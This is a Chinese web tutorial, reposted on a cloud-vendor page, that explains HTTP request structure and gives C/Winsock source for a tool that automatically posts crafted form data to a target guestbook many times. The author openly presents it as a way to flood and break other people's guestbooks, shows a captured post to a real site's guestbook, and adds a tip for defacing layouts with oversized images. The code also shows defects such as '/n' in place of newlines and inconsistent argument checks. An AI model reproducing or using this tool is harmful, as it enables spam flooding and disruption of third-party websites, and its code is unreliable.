用Winsock實現對網站資料庫的資料注入

來源:互聯網
上載者:User
作者:JsuFcz 文章來源:焦點
作者個人首頁地址:http://jsufcz.21xcn.net/

在寫這篇文章之前,有必要對"注入"一詞闡述一下。區別於通常的SQL注入,這裡的注入實際上只是構造HTTP請求報文,以程式的方式代替WEB提交頁面,實現資料的自動認可。嘿嘿,說到這,我看到你詭異的笑容了,我們只要寫個迴圈,用什麼語言你說了算,向特定的WEB頁面發送HTTP報文,只要幾分鐘,呵呵他的本本就爆了,而且......嘿、嘿、嘿......偶喝杯茶,接下再寫。    首先,還是溫習一下HTTP協議吧。我們在開啟一個網站時,比如說http://www.163.com,實際上IE作為一個用戶端,它將向伺服器發送如下的請求報文(偶用sniffer截得的):

GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-
powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: www.163.com
Connection: Keep-Alive
Cookie: NETEASE_SSN=jsufcz; NETEASE_ADV=11&22; Province=0; City=0; NTES_UV_COOKIE=YES

我們看到在以上的報文中,有很多欄位,當然其中有很多並不是必須的,如果我們自己編程,只關心必要的就行了。在HTTP/1.1協議中規定了最小請求訊息由方法欄位(GET/POST/HEAD)和主機欄位(HOST)構成。如上面的
GET / HTTP/1.1
HOST:www.163.com
但在HTTP/1.0中,HOST欄位並不是必須的,這裡為什麼不能省,相信你也知道,不曉得的話也不打緊,接下來看。

為了向伺服器發送資料,瀏覽器通常採用GET或POST方法向伺服器提交報文。伺服器在收到報文之後,解碼分析出所需的資料並進行處理,最後返回結果。通常我們可以見到諸如http://xxx.xxx.xxx.xxx/show.asp?id=xxx的URL請求,我們可以自己構造如下的報文來完成

GET /show.asp?id=xxx HTTP/1.1
HOST:xxx.xxx.xxx.xxx

受URL長度1024的限制,採用GET方法只能提交少量的資料,假如我們在錄入一篇文章時,這時就只能用到POST方法了。在講解POST方法的一些要點之前,還是讓大家來看一段POST請求報文,以致對POST報文有個大致的瞭解。(下面是我向某本本的留言,偶照樣用sniffer截下來了)

POST /gbook/add.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-
powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwav
e-flash, */*
Referer: http://218.76.65.47/gbook/add.php
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 218.76.65.47
Content-Length: 115
Connection: Keep-Alive

name=test&email=&comefrom=&homepage=&icq=&oicq=&image=say.gif&comment=test&passw
ord=&doadd=%B7%A2%CB%CD%C1%F4%D1%D4

與GET方法相比,在欄位下面多了一段內容,這就是我們向留言本提交的資料,如果有中文須經過urlencode編碼。同樣讓我們省去不必要的欄位,構造一個最小的POST請求

POST /gbook/add.php HTTP/1.1
Host: 218.76.65.47
Content-Type: application/x-www-form-urlencoded
Content-Length: 115

name=test&email=&comefrom=&homepage=&icq=&oicq=&image=say.gif&comment=test&passw
ord=&doadd=%B7%A2%CB%CD%C1%F4%D1%D4

上面的Content-Type欄位表示為POST表單型的,Content-Length當然就是表示實體資料的長度了,這裡都不能少,不然就無法正確接收了。這樣,伺服器端處理頁面就會收到你提交的資料,並接收處理,如果是留言本的話就寫入資料庫了。若以很快的速度向某個本本發送這樣的報文,實際上那個本本己經被你狂灌水了。

嗚嗚嗚,看上面偶都不知道講了些什麼,亂不拉幾的,就是偶也想盡量講得清楚點,無耐高考語文沒及格,就成這樣了咯,還望哥哥姐姐們見諒見諒。講了用戶端的發送,接下來就該講伺服器的接收問題了。

當報文資料到達伺服器後,伺服器底層進程進行接收並放入特定的緩衝區,同時置一些環境變數,如"CONTENT_LENGTH"、"QUERY_STRING"等,當然這其間還是屏蔽了一些底層細節的,如用戶端提交的資料是怎麼被重設到被請求頁的標準輸入的,偶也弄不清楚,嘿嘿要能弄清楚了,偶就寫作業系統去。之後高層應用程式如CGI、ASP、PHP等對其進行資料提取,其中CGI還須自己進行Unencode解碼和字串提取。假如向一ASP本本寫留言,我提交了姓名(name)和內容(body)欄位,且採用POST表單方式提交,在ASP程式中應如下進行接收:
name=request.form("name")
body=request.form("body")
並添加到資料庫中
rs.addnew
rs("name")=name
rs("body")=body
rs.update

到此,該講的也基本上講完了,但有一點還要注意下,在發送報文時,在實體內容中還須加入提交按鈕的"name=value"URLEncode編碼,否則有可能不會寫入資料庫,Why ?I am finding the reason!

以下是相關的原始碼:

/* encode.h */

/* Unencode URL編碼函數 */
/*
在這裡要注意,編譯器在處理中文字元時,會自動根據字元的位7來讀入一個
或兩個字元,這時可以強制採用unsigned char *來讀入一個字元。
*/

int isT(char ch)
{
if(ch==' '||ch=='%'||ch=='/'||ch&0x80) return 1;
else return 0;
}

int encode(char *s,char *d)
{
if(!s||!d) return 0;
for(;*s!=0;s++)
{
unsigned char *p=(unsigned char*)s;
if(*p==' ')
{
*d='%';
*(d+1)='2';
*(d+2)='0';
d+=3;
}
else if(isT(*p))
{
char a[3];
*d='%';
sprintf(a,"%02x",*p);
*(d+1)=a[0];
*(d+2)=a[1];
d+=3;
}
else
{
*d=*p;
d++;
}
}
*d=0;
return 1;
}

/* Unencode URL解碼函數 */

int unencode(char *s,char *d)
{
if(!s||!d) return 0;
for(;*s!=0;s++)
{
if(*s=='+')
{
*d=' ';
d++;
}
else if(*s=='%')
{
int code;
if(sscanf(s+1,"%02x",&code)!=1) code='?';
*d=code;
s+=2;
d++;
}
else
{
*d=*s;
d++;
}
}
*d=0;
return 1;
}

/* booksend.cpp */

/* 報文發送程式 */

#include <stdio.h>
#include <stdlib.h>
#include "encode.h"
#include <winsock2.h>

#pragma comment(lib,"ws2_32.lib")

int checkpra(int argc,char *argv[]);
void usage(char *filepath);
DWORD WINAPI senddata(LPVOID lp);

char ip[20]={0};
USHORT port=0;
char page[128]={0};
char value[1024]={0};
int ttime=1;
int delaytime=2000;
SOCKET sock;
struct sockaddr_in sin;
char sendbuf[1024*4]={0};

void main(int argc,char *argv[])
{
if(checkpra(argc,argv)==-1) return;

WSADATA wsa;
if(WSAStartup(0x0202,&wsa)!=0)
{
printf("WSAStartup failed with error:%d/n",GetLastError());
return;
}

sin.sin_family=AF_INET;
if(inet_addr(ip)!=INADDR_NONE)
sin.sin_addr.s_addr=inet_addr(ip);
else
{
struct hostent *phost=gethostbyname(ip);
if(phost==NULL)
{
printf("Resolve %s error!/n",ip);
return;
}
memcpy(&sin.sin_addr,phost->h_addr_list[0],phost->h_length);
}
sin.sin_port=htons(port);

char tempbuf[1024]={0};
sprintf(tempbuf,"POST %s HTTP/1.1/n",page);
strcpy(sendbuf,tempbuf);
memset(tempbuf,0,sizeof(tempbuf));
sprintf(tempbuf,"HOST: %s/n",ip);
strcat(sendbuf,tempbuf);
strcat(sendbuf,"Accept: image/gif, */*/n");
strcat(sendbuf,"Content-Type: application/x-www-form-urlencoded/n");
memset(tempbuf,0,sizeof(tempbuf));
sprintf(tempbuf,"Content-Length: %d/n",strlen(value));
strcat(sendbuf,tempbuf);
strcat(sendbuf,"Connection: Keep-Alive/n/n");
strcat(sendbuf,value);

for(int i=0;i<ttime;i++)
{
createThread(NULL,0,senddata,&i,0,NULL);
Sleep(delaytime);
}
WSACleanup();
}

DWORD WINAPI senddata(LPVOID lp)
{
SOCKET sock=socket(AF_INET,SOCK_STREAM,0);
if(sock==INVALID_SOCKET)
{
printf("Socket() failed with error:%d/n",GetLastError());
return -1;
}
int ret;
printf("State:Connecting.../n");
ret=connect(sock,(struct sockaddr*)&sin,sizeof(sin));
if(ret==SOCKET_ERROR)
{
printf("Connect() failed with error:%d/n",GetLastError());
return -1;
}
printf("State:Connected!/n");
printf("State:Sending...time %d ",*(int*)lp+1);
ret=send(sock,sendbuf,strlen(sendbuf)+1,0);
if(ret>0)
printf("Send success!/n");
else
printf("Send error!/n");

char recvbuf[1024*10]={0};
ret=recv(sock,recvbuf,sizeof(recvbuf),0);
if(strstr(recvbuf,"100")||strstr(recvbuf,"200"))
printf("呵呵,注入成功啦!/n/n");
else
printf("注入有點問題哦,請查實一下!/n/n");
closesocket(sock);
return 1;
}

void usage(char *filepath)
{
char *p=filepath+strlen(filepath)-1;
for(;*p!='//';p--);
printf("-------------------------------------------------------------------------------/n");
printf("Usage:%s ip port page value [times] [delay]/n",p+1);
printf("Code by JsuFcz--http://jsufcz.21xcn.net/n");
printf("Ex:%s 10.0.0.169 80 /guestbk/add.php name=abc-body=hehe-doadd=發送留言",p+1);
printf("-------------------------------------------------------------------------------/n");
}

int checkpra(int argc,char *argv[])
{
if(argc<5)
{
printf("錯誤的用法:至少應使用4個參數/n/n");
usage(argv[0]);
return -1;
}
else if(argc>6)
{
printf("錯誤的用法:最多隻有6個參數/n/n");
usage(argv[0]);
return -1;
}
if(argc==6)
{
ttime=atoi(argv[5]);
}
if(argc==7)
{
ttime=atoi(argv[5]);
delaytime=atoi(argv[6]);
}
strcpy(ip,argv[1]);
port=atoi(argv[2]);
strcpy(page,argv[3]);
encode(argv[4],value);
return 0;
}

以上代碼已在VC6上編譯通過,你也可以到本人個人首頁上(http://jsufcz.21xcn.net)下載到原始碼和命令列程式。

在文章的最後,偶還有一點心得要與大家分享。在留言本中如果有提交表情或是圖片之類的,由於本本的相對連結的限制,只要是本本目錄下的圖片資源,偶們就可以隨便拿來貼,這樣如果某個圖片的盡寸很大的話,本本的版面就被你弄壞了

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.